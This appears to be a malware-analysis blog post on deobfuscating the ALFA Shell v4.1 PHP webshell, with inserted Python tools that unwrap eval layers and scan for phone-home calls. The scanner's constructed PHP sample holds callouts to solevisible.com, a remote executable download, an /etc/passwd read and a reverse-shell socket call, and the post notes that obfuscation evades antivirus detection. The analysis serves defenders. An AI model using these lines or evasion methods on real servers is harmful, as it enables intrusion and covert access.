Deobfuscation and ALFA Shell v4.1

What is a webshell?

A webshell is a shell-like interface (a shell, in operating-system terms, being the layer that connects the user to the operating system) that gives an attacker remote access to and control over a web server. Through it the attacker can read and modify your files from an ordinary web browser. Webshells can be written in any server-side language the target runs, PHP being the most common.

In other words, a webshell is a malicious script that an attacker drops on a compromised web server to spread further or to maintain persistent access. A webshell cannot exploit a remote vulnerability by itself, so it is always the second stage of an attack: something else (a file-upload flaw, stolen credentials, an RCE bug) has to put it on the server first.

What is obfuscation?

In software development, obfuscation is the process of transforming an application's code so that it is difficult for humans, or for machines such as antivirus engines, to examine and understand. Obfuscation techniques hide the purpose and logic of the code and the values it contains, which lowers the chance of tampering and reverse engineering (and, for some people, turns the code into a puzzle to solve for fun).

Obfuscation can be done by hand or with dedicated tools called obfuscators. Some of the common techniques are:

  • Giving variables and functions misleading or meaningless names
  • Adding misleading comments
  • Encoding strings (base64, compression, ROT13, and so on)
  • Removing or adding whitespace
  • Control-flow obfuscation
  • Adding dead code and writing code in an unusual shape and layout

Deobfuscating the Alfa Shell code

Alfa Shell is one of the most widely used webshells and is attributed to Iranian authors. There are about four major versions of this webshell, and I have covered the deobfuscation method for the previous three versions before. Here I am going to cover version 4.1, the latest version of Alfa Shell.

To begin, we first need to obtain the obfuscated Alfa source:

https://github.com/Ravin-Academy/DeObfuscation_ALFA_SHELL_V4.1/blob/main/Decode%20Of%20ALFA%20Team/alfav4.1-tesla.php

Then we save the code in a file under a different name; here we saved it as alfav4.1-tesla_encode_1.php:

https://github.com/Ravin-Academy/DeObfuscation_ALFA_SHELL_V4.1/blob/main/alfav4.1-tesla_encode_1.php

In the next step we change the value of the variable $WMKVyvv='e'.'v'.'a'.'l' to $WMKVyvv='echo'; so that the decoded payload is printed instead of executed, and then run this command in a Linux terminal:

php alfav4.1-tesla_encode_1.php > alfav4_decode.php

The decoded content is saved in the new file alfav4_decode.php:

https://github.com/Ravin-Academy/DeObfuscation_ALFA_SHELL_V4.1/blob/main/alfav4_decode.php#L145&L181

You will see the following text at the beginning of this file:

/* You’re killing me again 🎧 Am I still in your head ? 🎧 You used to light me up 🎧 Now you shut me down — Solevisible */

This text is taken from the song Archive – Again:

www.youtube.com/watch?v=r7rF2EZ0A_0

The next point is that the code contains the following condition:

if(!isset($_SERVER["HTTP_HOST"]))exit;

Because of this condition, the webshell must be run through a web server (where $_SERVER["HTTP_HOST"] is set); when run from the command line it exits immediately. We comment out this line so that we can continue from the terminal.

Continuing along the same path, after adding the base64_decode step for the next layer we can carry on deobfuscating the ALFA Shell code. The added code is at the following path:

https://github.com/Ravin-Academy/DeObfuscation_ALFA_SHELL_V4.1/blob/main/alfav4_decode.php#L66&L70

Then run the following command again in the Linux terminal:

php alfav4_decode.php > final_decode.php

Now the output of the deobfuscated code is saved in the file final_decode.php. This file can be downloaded from the following link:

https://github.com/Ravin-Academy/DeObfuscation_ALFA_SHELL_V4.1/blob/main/final_decode.php
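The two-pass procedure above (rename the eval alias to echo, run PHP, repeat for the next layer) can be automated when the wrapper follows the alias-eval pattern. The following is an added example written for this article; it is not the article's own code and not the ALFA project's code, and it does not reproduce ALFA's real layers. Instead of letting PHP execute $WMKVyvv('...'), it resolves the alias built from concatenated string pieces, applies the decoder chain (base64_decode, gzinflate, and similar) itself, and keeps peeling until no eval wrapper remains. The obfuscated sample it unwraps is constructed inside the script, so it runs offline; the variable names, decoder set and payload are assumptions for the example.

```python
import base64
import re
import zlib

# Added example (not the article's or the ALFA project's code). The sample payload
# is constructed below; ALFA's real wrapper layers are not reproduced here.

ROT13 = str.maketrans(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
    "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm",
)

# PHP built-ins obfuscators chain around eval(), with byte-exact Python equivalents.
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),   # raw DEFLATE, like PHP gzinflate()
    "gzuncompress": zlib.decompress,                  # zlib-framed, like PHP gzuncompress()
    "str_rot13": lambda b: b.decode("latin-1").translate(ROT13).encode("latin-1"),
    "strrev": lambda b: b[::-1],
}

# $name = 'e'.'v'.'a'.'l';      -> alias definition built from string pieces
ALIAS_RE = re.compile(r"\$(\w+)\s*=\s*((?:'[^']*'\s*\.?\s*)+);")
# $name(f1(f2('payload')));     -> aliased call with a chain of decoders around a literal
CALL_RE = re.compile(r"\$(\w+)\s*\(((?:\s*\w+\s*\()*)\s*'([^']*)'\s*\)+\s*;")


def eval_aliases(src):
    """Map variables assigned from concatenated literals to the string they hold."""
    return {name: "".join(re.findall(r"'([^']*)'", pieces))
            for name, pieces in ALIAS_RE.findall(src)}


def peel_layer(src):
    """Return the code hidden under one aliased-eval wrapper, or None if there is none."""
    aliases = eval_aliases(src)
    for m in CALL_RE.finditer(src):
        name, chain, payload = m.groups()
        if aliases.get(name) != "eval":
            continue
        data = payload.encode("latin-1")
        for func in reversed(re.findall(r"\w+", chain)):   # innermost decoder first, as PHP does
            data = DECODERS[func](data)
        return data.decode("latin-1")
    return None


def unwrap(src, max_layers=20):
    """Peel wrappers until plain code remains; returns (code, number_of_layers_removed)."""
    layers = 0
    while layers < max_layers:
        inner = peel_layer(src)
        if inner is None:
            break
        src, layers = inner, layers + 1
    return src, layers


def deflate_raw(data):
    """Raw DEFLATE stream, the format PHP's gzdeflate() produces and gzinflate() reads."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def build_sample():
    """Constructed two-layer sample in the alias-eval style; returns (obfuscated, plain)."""
    plain = 'if(!isset($_SERVER["HTTP_HOST"]))exit;\necho "decoded layer";\n'
    layer1 = ("$WMKVyvv='e'.'v'.'a'.'l';$WMKVyvv(gzinflate(base64_decode('"
              + base64.b64encode(deflate_raw(plain.encode())).decode() + "')));")
    layer2 = ("$zz='ev'.'al';$zz(base64_decode('"
              + base64.b64encode(layer1.encode()).decode() + "'));")
    return layer2, plain


if __name__ == "__main__":
    obfuscated, plain = build_sample()
    code, layers = unwrap(obfuscated)
    print(f"removed {layers} layer(s); recovered plain code:\n{code}")
```

The important design choice is that nothing from the sample is ever executed: the decoders are pure Python, so the HTTP_HOST exit check and any call-home code in the recovered layer are only read, never run. Real samples often add decoders beyond the five listed here (custom XOR loops, str_replace tables), at which point the manual echo trick from the article is still the fallback.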

Comparing our decoded version with Alfa's own decoded version

The following file is the decoded version that the Alfa team shipped alongside its obfuscated version. Here we compare our decoded output with Alfa's decoded version to see where they differ:

https://github.com/Ravin-Academy/DeObfuscation_ALFA_SHELL_V4.1/blob/main/Decode%20Of%20ALFA%20Team/alfa-shell-v4.1-tesla-decoded.php

For this purpose we uploaded the two files to the site below for comparison; according to the result, they are identical. So we conclude that the decoding process worked correctly:

https://www.diffchecker.com/MT1BKXXj

Static analysis

One of the most common ways attackers steal access from less experienced attackers is to build and distribute tools that, once used, act as a backdoor for the tool's author. Accordingly, we continue by analyzing this webshell to see whether it acts as a backdoor for its authors (the Alfa team).

In this step we checked whether the webshell, once installed, tries to communicate with a specific address. For example, it is common for backdoored webshells to send their URL to their authors after installation. Examining the code related to this section, no suspicious case was observed.

It was, however, observed that the webshell sends an HTTP request to http://solevisible.com after installation. As a result, if you upload this webshell anywhere, a request is sent to this address and the IP address of the server you installed it on is recorded in the solevisible.com web server's logs. An example of the resulting Apache log structure is shown in the following figure:
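One way to make the "does it phone home?" check above systematic, and to separate hard-coded callbacks from network code the operator drives (reverse-shell targets taken from a POST parameter), is to scan the decoded source for network-capable PHP calls whose arguments contain an absolute URL. The scanner below is an added example written for this article, not code from the article or from the ALFA project. The PHP fragment it scans is constructed for the example: only the two solevisible.com URLs are the ones the article reports (the installation callback and, later in the article, the windows.exe download); the surrounding PHP, the function list and the line layout are assumptions.

```python
import re
from urllib.parse import urlparse

# Added example (not the article's or the ALFA project's code). Constructed PHP
# fragment; only the two solevisible.com URLs come from the article's findings.
SAMPLE = r'''<?php
if(!isset($_SERVER["HTTP_HOST"]))exit;
$self = "http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"];
@file_get_contents("http://solevisible.com/?u=".urlencode($self));
if (stristr(PHP_OS, "WIN")) {
    $nc = @fopen("http://solevisible.com/bc/windows.exe", "rb");
}
$local = file_get_contents("/etc/passwd");
$sock = fsockopen($_POST["host"], (int)$_POST["port"], $errno, $errstr, 30);
'''

# PHP functions that can open a remote resource: the stream wrappers honour http://
# URLs when allow_url_fopen is on, curl and raw sockets do so regardless.
SINKS = ("file_get_contents", "fopen", "readfile", "copy", "curl_init",
         "curl_setopt", "fsockopen", "stream_socket_client")
SINK_RE = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\(([^;]*)")
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s\"']*)?")


def find_callouts(src):
    """(line_no, sink, url) for every sink call whose arguments embed an absolute URL."""
    hits = []
    for no, line in enumerate(src.splitlines(), 1):
        for m in SINK_RE.finditer(line):
            sink, args = m.groups()
            hits.extend((no, sink, url) for url in URL_RE.findall(args))
    return hits


def phone_home_hosts(src):
    """Hosts the script contacts on its own, without any operator-supplied input."""
    return sorted({urlparse(url).hostname for _, _, url in find_callouts(src)})


if __name__ == "__main__":
    for no, sink, url in find_callouts(SAMPLE):
        print(f"line {no}: {sink}() -> {url}")
    print("hard-coded hosts:", phone_home_hosts(SAMPLE))
```

Note what the scanner deliberately ignores: the fsockopen() call with a host taken from $_POST is a reverse-shell feature the operator controls, and the file_get_contents() of a local path is not a callout. Only calls that embed a literal URL are reported, which is exactly the class of behaviour the article is looking for, since it runs regardless of who installed the shell. A literal-URL scan misses URLs assembled at runtime from encoded pieces, so it complements rather than replaces reading the decoded code.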

Reviewing the Python and Perl code

The review showed that part of this webshell invokes obfuscated code written in Python and Perl. This part of the webshell is responsible for creating reverse shells on Linux servers. So I deobfuscated this code as well, to check whether anything suspicious or malicious is hidden in it. You can get the code from the following addresses:

https://github.com/Ravin-Academy/DeObfuscation_ALFA_SHELL_V4.1/blob/main/obfuscation_perl.pl

https://github.com/Ravin-Academy/DeObfuscation_ALFA_SHELL_V4.1/blob/main/obfuscation_python.py

I reviewed both of these sections thoroughly and found nothing suspicious in this part of the webshell.

The windows.exe binary

This binary is downloaded automatically from http://solevisible.com/bc/windows.exe and executed when you ask the webshell for a netcat (nc) reverse shell on a Windows server. We also examined this file in Ghidra and found nothing suspicious. The interesting thing about it is that some antivirus engines flag it as malware, so if you use it, it will be detected by the antivirus on the web server.

Comparing antivirus detection of the deobfuscated and obfuscated versions

As you can see in the figure below, our deobfuscated version is detected by some antivirus engines as malware.

As the next figure shows, the obfuscated version was not detected by any of the antivirus engines.

In the figure after that you can see the scan result for the unobfuscated version published by the Alfa team itself.

Our investigation found no malicious activity in this webshell, but the address of the server on which you install it will be sent to the Alfa team's server. So in your penetration-testing or red-team work, avoid ready-made tools as far as possible, or at least examine them carefully before use. We also saw that slightly modifying or obfuscating the code of a malicious file has a significant effect on whether antivirus engines detect it.
